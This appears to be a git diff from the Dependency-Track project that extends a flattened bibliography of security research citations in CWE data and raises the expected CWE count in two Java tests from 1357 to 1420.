Attacks and Countermeasures on Contemporary Hardware - 2016 - --10 - ---24 - https://eprint.iacr.org/2016/613.pdf - - - moparisthebest - Validation Vulnerabilities - 2015 - --06 - ---05 - https://mailarchive.ietf.org/arch/msg/acme/s6Q5PdJP48LEUwgzrVuw_XPKCsM/ - - - Josh Aas - Daniel McCarney - Roland Shoemaker - Multi-Perspective Validation Improves Domain Validation Security - 2020 - --02 - ---19 - https://letsencrypt.org/2020/02/19/multi-perspective-validation.html - - - Miguel Castro - Barbara Liskov - Practical Byzantine Fault Tolerance and Proactive Recovery - 2002 - --11 - ---04 - https://dl.acm.org/doi/pdf/10.1145/571637.571640 - - - Stephan van Schaik - Cristiano Giuffrida - Herbert Bos - Kaveh Razavi - Malicious Management Unit: Why Stopping Cache Attacks in Software is Harder Than You Think - 2018 - --08 - ---15 - https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-van_schaik.pdf - - - Christopher Tarnovsky - Security Failures In Secure Devices - 2008 - --02 - ---21 - https://www.blackhat.com/presentations/bh-dc-08/Tarnovsky/Presentation/bh-dc-08-tarnovsky.pdf - - - Mark Ermolov, Positive Technologies - Intel x86 Root of Trust: loss of trust - 2020 - --03 - ---05 - https://blog.ptsecurity.com/2020/03/intelx86-root-of-trust-loss-of-trust.html - - - John Butterworth - Cory Kallenberg - Xeno Kovah - BIOS Chronomancy: Fixing the Core Root of Trust for Measurement - 2013 - --07 - ---31 - https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf - - - 2020 CWE Top 25 Most Dangerous Software Weaknesses - 2020 - --08 - ---20 - http://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html - - - Consortium for Information & Software Quality (CISQ) - Automated Source Code Quality Measures - 2020 - https://www.omg.org/spec/ASCQM/ - - - Taku Izumi, Fujitsu Limited - Address Range Memory Mirroring - 2016 - https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf - - - Benoit Morgan, Eric Alata, Vincent Nicomette, Mohamed Kaaniche - Bypassing IOMMU Protection against I/O Attacks - 2016 - https://hal.archives-ouvertes.fr/hal-01419962/document - - - Colin L. Rothwell - Exploitation from malicious PCI Express peripherals - 2019 - https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-934.pdf - - - Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets - BARing the System – New vulnerabilities in Coreboot & UEFI-based Systems - 2017 - https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf - - - Stewart Smith - CVE-2019-6260: Gaining control of BMC from the host processor - 2019 - https://www.flamingspork.com/blog/2019/01/23/cve-2019-6260:-gaining-control-of-bmc-from-the-host-processor/ - - - ARM - AMBA APB Protocol Specification, Version 2.0 - 2010 - https://www.eecs.umich.edu/courses/eecs373/readings/IHI0024C_amba_apb_protocol_spec.pdf - - - OCP-IP - Open Core Protocol Specification, Release 2.2 - 2006 - http://read.pudn.com/downloads95/doc/388103/OCPSpecification%202.2.pdf - - - Marc Witteman - Secure Application Programming in the presence of Side Channel Attacks - 2017 - https://www.riscure.com/uploads/2018/11/201708_Riscure_Whitepaper_Side_Channel_Patterns.pdf - - - A. Dehbaoui, J. M. Dutertre, B. Robisson, P. Orsatelli, P. Maurine, A. Tria - Injection of transient faults using electromagnetic pulses. Practical results on a cryptographic system - 2012 - https://eprint.iacr.org/2012/123.pdf - - - A. Menu, S. Bhasin, J. M. Dutertre, J. B. Rigaud, J. Danger - Precise Spatio-Temporal Electromagnetic Fault Injections on Data Transfers - 2019 - https://hal.telecom-paris.fr/hal-02338456/document - - - Colin O'Flynn - BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks - https://eprint.iacr.org/2020/937.pdf - - - J. Balasch, D. Arumí, S. Manich - Design and Validation of a Platform for Electromagnetic Fault Injection - https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8311630 - - - M. Gay, B. Karp, O. Keren, I. Polian - Error control scheme for malicious and natural faults in cryptographic modules - 2019 - https://link.springer.com/content/pdf/10.1007/s13389-020-00234-7.pdf - - - M. L. Akkar, L. Goubin, O. Ly - Automatic Integration of Counter-Measures Against Fault Injection Attacks - https://www.labri.fr/perso/ly/publications/cfed.pdf - - - Olivier Arteau - Prototype pollution attack in NodeJS application - 2018 - --05 - ---15 - https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf - - - Changhui Xu - What is Prototype Pollution? - 2019 - --07 - ---30 - https://codeburst.io/what-is-prototype-pollution-49482fc4b638 - - - Jerry Backer - David Hely - Ramesh Karri - Secure design-for-debug for Systems-on-Chip - 2015 - --10 - ---06 - https://ieeexplore.ieee.org/document/7342418 - - - Jerry Backer - David Hely - Ramesh Karri - Secure and Flexible Trace-Based Debugging of Systems-on-Chip - 2016 - --12 - https://dl.acm.org/doi/pdf/10.1145/2994601 - - - Trusted Computing Group - TCG Roots of Trust Specification - 2018 - --07 - https://trustedcomputinggroup.org/wp-content/uploads/TCG_Roots_of_Trust_Specification_v0p20_PUBLIC_REVIEW.pdf - - - GlobalPlatform Security Task Force - Root of Trust Definitions and Requirements - 2017 - --03 - https://globalplatform.org/wp-content/uploads/2018/06/GP_RoT_Definitions_and_Requirements_v1.0.1_PublicRelease_CC.pdf - - - National Institute of Standards and Technology - NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization - 2014 - --12 - https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf - - - Hassan M. G. Wassel, Ying Gao, Jason K. Oberg, Tedd Huffmire, Ryan Kastner, Frederic T. Chong, Timothy Sherwood - SurfNoC: A Low Latency and Provably Non-Interfering Approach to Secure Networks-On-Chip - 2013 - http://cseweb.ucsd.edu/~kastner/papers/isca13-surfNOC.pdf - - - Leonid Grustniy - Loapi--This Trojan is hot! - 2017 - --12 - https://www.kaspersky.com/blog/loapi-trojan/20510/ - - - Consortium for Information & Software Quality (CISQ) - AUTOMATED SOURCE CODE MEASURE FOR DATA PROTECTION - 2020 - https://www.it-cisq.org/automated-source-code-measure-data-protection/index.htm - - - Akond Rahman - Md Rayhanur Rahman - Chris Parnin - Laurie Williams - Security Smells in Ansible and Chef Scripts: A Replication Study - 2020 - --06 - ---20 - https://arxiv.org/pdf/1907.07159.pdf - - - Akond Rahman - Chris Parnin - Laurie Williams - The Seven Sins: Security Smells in Infrastructure as Code Scripts - ICSE '19: Proceedings of the 41st International Conference on Software Engineering - 2019 - --05 - https://dl.acm.org/doi/10.1109/ICSE.2019.00033 - - - Niek Timmers - Albert Spruyt - Marc Witteman - Controlling PC on ARM Using Fault Injection - 2016 Workshop on Fault Diagnosis and Tolerance in Cryptography (FDTC) - 2016 - --08 - ---16 - https://dl.acm.org/doi/10.1109/ICSE.2019.00033 - - - Josep Balasch - Benedikt Gierlichs - Ingrid Verbauwhede - An In-depth and Black-box Characterization of the Effects of Clock Glitches on 8-bit MCUs - 2011 Workshop on Fault Diagnosis and Tolerance in Cryptography (IEEE) - 2011 - --09 - https://ieeexplore.ieee.org/document/6076473 - - - Jan Goyvaerts - Runaway Regular Expressions: Catastrophic Backtracking - 2019 - --12 - ---22 - https://www.regular-expressions.info/catastrophic.html - - - Adar Weidman - Regular expression Denial of Service - ReDoS - https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS - - - Ilya Kantor - Catastrophic backtracking - 2020 - --12 - ---13 - https://javascript.info/regexp-catastrophic-backtracking - - - Cristian-Alexandru Staicu - Michael Pradel - Freezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers - USENIX Security Symposium - 2018 - --07 - ---11 - https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-staicu.pdf - - - James C. Davis - Christy A. Coghlan - Francisco Servant - Dongyoon Lee - The Impact of Regular Expression Denial of Service (ReDoS) in Practice: An Empirical Study at the Ecosystem Scale - 2018 - --08 - ---01 - https://people.cs.vt.edu/fservant/papers/Davis_Coghlan_Servant_Lee_ESECFSE18.pdf - - - James Davis - The Regular Expression Denial of Service (ReDoS) cheat-sheet - 2020 - --05 - ---23 - https://levelup.gitconnected.com/the-regular-expression-denial-of-service-redos-cheat-sheet-a78d0ed7d865 - - - Catalin Cimpanu - Microsoft warns enterprises of new 'dependency confusion' attack technique - ZDNet - 2021 - --02 - ---10 - https://www.zdnet.com/article/microsoft-warns-enterprises-of-new-dependency-confusion-attack-technique/ - - - Alex Birsan - Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - 2021 - --02 - ---09 - https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 - - - Microsoft - 3 Ways to Mitigate Risk When Using Private Package Feeds - 2021 - --02 - ---09 - https://azure.microsoft.com/mediahandler/files/resourcefiles/3-ways-to-mitigate-risk-using-private-package-feeds/3%20Ways%20to%20Mitigate%20Risk%20When%20Using%20Private%20Package%20Feeds%20-%20v1.0.pdf - - - Matthew Green - Why IND-CPA implies randomized encryption - 2018 - --08 - ---24 - https://blog.cryptographyengineering.com/why-ind-cpa-implies-randomized-encryption/ - - - NIST - Recommendation for Block Cipher Modes of Operation - 2001 - --12 - https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38a.pdf - - - Wikipedia - Block cipher mode of operation - 2021 - --03 - ---03 - https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation - - - Wikipedia - File:Tux ecb.jpg - 2006 - --05 - ---20 - https://commons.wikimedia.org/wiki/File:Tux_ecb.jpg - - - Nikita Borisov - Ian Goldberg - David Wagner - Intercepting Mobile Communications: The Insecurity of 802.11 - Proceedings of the Seventh Annual International Conference on Mobile Computing And Networking - 2001 - --07 - ACM - http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf - - - Wikipedia - Birthday problem - 2021 - --03 - ---06 - https://en.wikipedia.org/wiki/Birthday_problem - - - Wikipedia - Initialization Vector - 2021 - --03 - ---08 - https://en.wikipedia.org/wiki/Initialization_vector - - - NIST - Recommendation for Block Cipher Modes of Operation: Galois/Counter Mode (GCM) and GMAC - 2007 - --11 - https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf - - - Arxum Path Security - CBC Mode is Malleable. Don’t trust it for Authentication - 2019 - --10 - ---16 - https://www.arxumpathsecurity.de/blog/2019/10/16/cbc-mode-is-malleable-dont-trust-it-for-authentication - - - Scott A. Crosby - Regular Expression Denial of Service - 2003 - --08 - https://web.archive.org/web/20031120114522/http://www.cs.rice.edu/~scrosby/hash/slides/USENIX-RegexpWIP.2.ppt - - - Nikolaos Athanasios Anagnostopoulos - Tolga Arul - Markus Rosenstihl - André Schaller - Sebastian Gabmeyer - Stefan Katzenbeisser - Low-Temperature Data Remnanence ATtacks Against Intrinsic SRAM PUFs - 2018 - --10 - ---15 - https://ieeexplore.ieee.org/abstract/document/8491873/ - - - Yuan Cao - Yunyi Guo - Benyu Liu - Wei Ge - Min Zhu - Chip-Hong Chang - A Fully Digital Physical Unclonable Function Based Temperature Sensor for Secure Remote Sensing - 2018 - --10 - ---11 - https://ieeexplore.ieee.org/abstract/document/8487347/ - - - Urbi Chatterjee - Soumi Chatterjee - Debdeep Mukhopadhyay - Rajat Subhra Chakraborty - Machine Learning Assisted PUF Calibration for Trustworthy Proof of Sensor Data in IoT - 2020 - --06 - https://dl.acm.org/doi/abs/10.1145/3393628 - - - Wikipedia - Power Analysis - https://en.wikipedia.org/wiki/Power_analysis - - - 2021 CWE Top 25 Most Dangerous Software Weaknesses - 2021 - --07 - ---20 - http://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html - - - Is COBOL holding you hostage with Math? - 2018 - --07 - ---28 - https://medium.com/the-technical-archaeologist/is-cobol-holding-you-hostage-with-math-5498c0eb428b - - - Intermediate results and arithmetic precision - 2021 - --06 - ---30 - https://www.ibm.com/docs/en/cobol-zos/6.2?topic=appendixes-intermediate-results-arithmetic-precision - - - 8.1.2. Arbitrary Precision Numbers - 2021 - --06 - ---24 - https://www.postgresql.org/docs/8.3/datatype-numeric.html#DATATYPE-NUMERIC-DECIMAL - - - Muller's Recurrence - 2017 - --11 - ---11 - https://scipython.com/blog/mullers-recurrence/ - - - An Improvement To Floating Point Numbers - 2015 - --10 - ---22 - https://hackaday.com/2015/10/22/an-improvement-to-floating-point-numbers/ - - - HIGH PERFORMANCE COMPUTING: ARE WE JUST GETTING WRONG ANSWERS FASTER? - 1999 - --06 - ---23 - https://www3.nd.edu/~markst/cast-award-speech.pdf - - - Information Technology Laboratory, National Institute of Standards and Technology - FIPS PUB 140-3: SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES - 2019 - --03 - ---22 - https://csrc.nist.gov/publications/detail/fips/140/3/final - - - James Kettle - Server-Side Template Injection - 2015 - --08 - ---05 - https://portswigger.net/research/server-side-template-injection - - - James Kettle - Server-Side Template Injection: RCE For The Modern Web App - 2015 - --12 - ---27 - https://www.youtube.com/watch?v=3cT0uE7Y87s - - - Philippe Arteau - Template Injection in Action! - 2020 - --11 - https://gosecure.github.io/template-injection-workshop/#0 - - - Pravinrp - Server Side Template Injection - 2019 - --07 - ---30 - https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34 - - - Health Care Industry Cybersecurity Task Force - Report on Improving Cybersecurity in the - Health Care Industry - 2017 - --06 - https://www.phe.gov/Preparedness/planning/CyberTF/Documents/report2017.pdf - - - close - Perldoc Browser - https://perldoc.perl.org/functions/close - - - io — Core tools for working with streams — Python 3.9.7 documentation - 2021 - --09 - ---02 - https://docs.python.org/3.9/library/io.html#io.IOBase.close - - - FileOutputStream (Java Platform SE 7 ) - 2020 - https://docs.oracle.com/javase/7/docs/api/java/io/FileOutputStream.html - - - FileOutputStream (Java SE 11 & JDK 11 ) - 2021 - https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/io/FileOutputStream.html - - - Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, and Frank Piessens - LVI - Hijacking Transient Execution with Load Value Injection - 2020 - https://lviattack.eu/ - - - Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, and Frank Piessens - LVI: Hijacking Transient Execution through Microarchitectural Load Value Injection - 2020 - --01 - ---09 - https://lviattack.eu/lvi.pdf - - - Hijacking Transient Execution through Microarchitectural Load Value Injection - 2020 - --05 - ---18 - https://www.youtube.com/watch?v=99kVz-YGi6Y - - - Stephan van Schaik, Marina Minkin, Andrew Kwong, Daniel Genkin, Yuval Yarom - CacheOut: Leaking Data on Intel CPUs via Cache Evictions - 2020 - --12 - ---28 - https://cacheoutattack.com/files/CacheOut.pdf - - - OWASP Top 10:2021 - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/ - - - A01:2021 – Broken Access Control - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A01_2021-Broken_Access_Control/ - - - A02:2021 – Cryptographic Failures - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A02_2021-Cryptographic_Failures/ - - - A03:2021 – Injection - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A03_2021-Injection/ - - - A04:2021 – Insecure Design - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A04_2021-Insecure_Design/ - - - A05:2021 – Security Misconfiguration - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A05_2021-Security_Misconfiguration/ - - - A06:2021 – Vulnerable and Outdated Components - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/ - - - A07:2021 – Identification and Authentication Failures - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/ - - - A08:2021 – Software and Data Integrity Failures - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/ - - - A09:2021 – Security Logging and Monitoring Failures - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/ - - - A10:2021 – Server-Side Request Forgery (SSRF) - 2021 - --09 - ---24 - OWASP - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ - - - Ross Anderson - Security Engineering - 2001 - https://www.cl.cam.ac.uk/~rja14/musicfiles/manuscripts/SEv1.pdf - - - Graham Cluley - This Black Box Can Brute Force Crack iPhone PIN Passcodes - The Mac Security Blog - 2015 - --03 - ---16 - https://www.intego.com/mac-security-blog/iphone-pin-pass-code/ - - - Monodeep Kar - Arvind Singh - Santosh Ghosh - Sanu Mathew - Anand Rajan - Vivek De - Raheem Beyah - Saibal Mukhopadhyay - Blindsight: Blinding EM Side-Channel Leakage using Built-In Fully Integrated Inductive Voltage Regulator - 2018 - --02 - https://www.researchgate.net/publication/323411019_Blindsight_Blinding_EM_Side-Channel_Leakage_using_Built-In_Fully_Integrated_Inductive_Voltage_Regulator - - - Zhenyu Ning - Fengwei Zhang - Understanding the Security of ARM Debugging Features - 2019 IEEE Symposium on Security and Privacy (SP) - 2019 - --05 - ---22 - https://www.computer.org/csdl/proceedings-article/sp/2019/666000b156/19skgcwSgsE - - - Victor Lomne - Thomas Roche - A Side Journey to Titan - 2021 - --01 - ---07 - https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf - - - Alexandre Menu - Jean-Max Dutertre - Olivier Potin - Jean-Baptiste Rigaud - Experimental Analysis of the Electromagnetic Instruction Skip Fault Model - IEEE Xplore - 2020 - --04 - ---30 - https://ieeexplore.ieee.org/document/9081261 - - - Niek Timmers - Albert Spruyt - Marc Witteman - Controlling PC on ARM using Fault Injection - 2016 - --06 - ---11 - https://www.riscure.com/uploads/2017/09/Controlling-PC-on-ARM-using-Fault-Injection.pdf - - - Colin O'Flynn - Attacking USB Gear with EMFI - Circuit Cellar - 2019 - --05 - https://www.totalphase.com/media/pdf/whitepapers/Circuit_Cellar_TP.pdf - - - Project Zero - Exploiting the DRAM rowhammer bug to gain kernel privileges - 2015 - --03 - ---09 - https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html - - - Information Technology Laboratory, National Institute of Standards and Technology - FIPS PUB 140-2: SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES - 2001 - --05 - ---25 - https://csrc.nist.gov/publications/detail/fips/140/2/final - - - Wikipedia - Cryptographic primitive - https://en.wikipedia.org/wiki/Cryptographic_primitive - - - Gilbert Goodwill - Benjamin Jun - Josh Jaffe - Pankaj Rohatgi - A testing methodology for side-channel resistance validation - 2011 - https://csrc.nist.gov/csrc/media/events/non-invasive-attack-testing-workshop/documents/08_goodwill.pdf - - - ISO/IEC - ISO/IEC 17825:2016: Testing methods for the mitigation of non-invasive attack classes against cryptographic modules - 2016 - https://www.iso.org/standard/60612.html - - - Cryptography Research Inc. - Test Vector Leakage Assessment (TVLA) Derived Test Requirements (DTR) with AES - 2015 - --08 - https://www.rambus.com/wp-content/uploads/2015/08/TVLA-DTR-with-AES.pdf - - - Danilo Šijaˇci´c - Josep Balasch - Bohan Yang - Santosh Ghosh - Ingrid Verbauwhede - Towards efficient and automated side-channel evaluations at design time - Journal of Cryptographic Engineering, 10(4) - 2020 - https://www.esat.kuleuven.be/cosic/publications/article-3204.pdf - - - Amit Kumar - Cody Scarborough - Ali Yilmaz - Michael Orshansky - Efficient simulation of EM side-channel attack resilience - IEEE/ACM International Conference on Computer-Aided Design (ICCAD) - 2017 - https://dl.acm.org/doi/pdf/10.5555/3199700.3199717 - - - Yuan Yao - Tuna Tufan - Tarun Kathuria - Baris Ege - Ulkuhan Guler - Patrick Schaumont - Pre-silicon Architecture Correlation Analysis (PACA): Identifying and Mitigating the Source of Side-channel Leakage at Gate-level - 2021 - --04 - ---21 - IACR Cryptology ePrint Archive - https://eprint.iacr.org/2021/530.pdf - - - Elisabeth Oswald - Thomas Popp - Stefan Mangard - Power Analysis Attacks - Revealing the Secrets of Smart Cards - 2007 - https://www.springer.com/gp/book/9780387308579 - - - David Oswald - Bastian Richter - Christof Paar - Side-Channel Attacks on the Yubikey 2 One-Time Password Generator - 2013 - --06 - ---14 - https://www.emsec.ruhr-uni-bochum.de/media/crypto/veroeffentlichungen/2014/02/04/paper_yubikey_sca.pdf - - - NIST - CAVP Testing: Individual Component Testing - https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/component-testing - - - CERT Coordination Center - Intel BIOS locking mechanism contains race condition that enables write protection bypass - 2015 - --01 - ---05 - https://www.kb.cert.org/vuls/id/766164/ - - - MITRE - 2021 CWE Most Important Hardware Weaknesses - 2021 - --10 - ---28 - https://cwe.mitre.org/scoring/lists/2021_CWE_MiHW.html - - - François-Xavier Standaert - How (not) to Use Welch's T-test in Side-Channel Security Evaluations - 2017 - --02 - ---15 - IACR Cryptology ePrint Archive - https://eprint.iacr.org/2017/138.pdf - - - Carolyn Whitnall - Elisabeth Oswald - A Critical Analysis of ISO 17825 ('Testing methods for the mitigation of non-invasive attack classes against cryptographic modules') - 2019 - --09 - ---10 - IACR Cryptology ePrint Archive - https://eprint.iacr.org/2019/1013.pdf - - - Wikipedia - Network on a chip - https://en.wikipedia.org/wiki/Network_on_a_chip - 2021-10-24 - - - Subodha Charles - Prabhat Mishra - A Survey of Network-on-Chip Security Attacks and Countermeasures - ACM Computing Surveys - 2021 - --05 - https://dl.acm.org/doi/fullHtml/10.1145/3450964 - 2021-10-24 - - - Bruce Schneier - Cryptanalysis of SHA-1 - 2005 - --02 - ---18 - https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html - 2021-10-25 - - - Dan Goodin - At death's door for years, widely used SHA1 function is now dead - 2017 - --02 - ---23 - Ars Technica - https://arstechnica.com/information-technology/2017/02/at-deaths-door-for-years-widely-used-sha1-function-is-now-dead/ - 2021-10-25 - - - \ No newline at end of file diff --git a/src/test/java/org/dependencytrack/persistence/CweImporterTest.java b/src/test/java/org/dependencytrack/persistence/CweImporterTest.java index 9bed40f5e..3f92f867a 100644 --- a/src/test/java/org/dependencytrack/persistence/CweImporterTest.java +++ b/src/test/java/org/dependencytrack/persistence/CweImporterTest.java @@ -31,6 +31,6 @@ public void testProcessCweDefinitions() throws Exception { importer.processCweDefinitions(); Cwe cwe79 = qm.getCweById(79); Assert.assertEquals("Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", cwe79.getName()); - Assert.assertEquals(1357, qm.getCwes().getTotal()); + Assert.assertEquals(1420, qm.getCwes().getTotal()); } } diff --git a/src/test/java/org/dependencytrack/resources/v1/CweResourceTest.java b/src/test/java/org/dependencytrack/resources/v1/CweResourceTest.java index 8a61abd04..ca13aeb18 100644 --- a/src/test/java/org/dependencytrack/resources/v1/CweResourceTest.java +++ b/src/test/java/org/dependencytrack/resources/v1/CweResourceTest.java @@ -58,7 +58,7 @@ public void getCwesTest() { .header(X_API_KEY, apiKey) .get(Response.class); Assert.assertEquals(200, response.getStatus(), 0); - Assert.assertEquals(String.valueOf(1357), response.getHeaderString(TOTAL_COUNT_HEADER)); + Assert.assertEquals(String.valueOf(1420), response.getHeaderString(TOTAL_COUNT_HEADER)); JsonArray json = parseJsonArray(response); Assert.assertNotNull(json); Assert.assertEquals(100, json.size());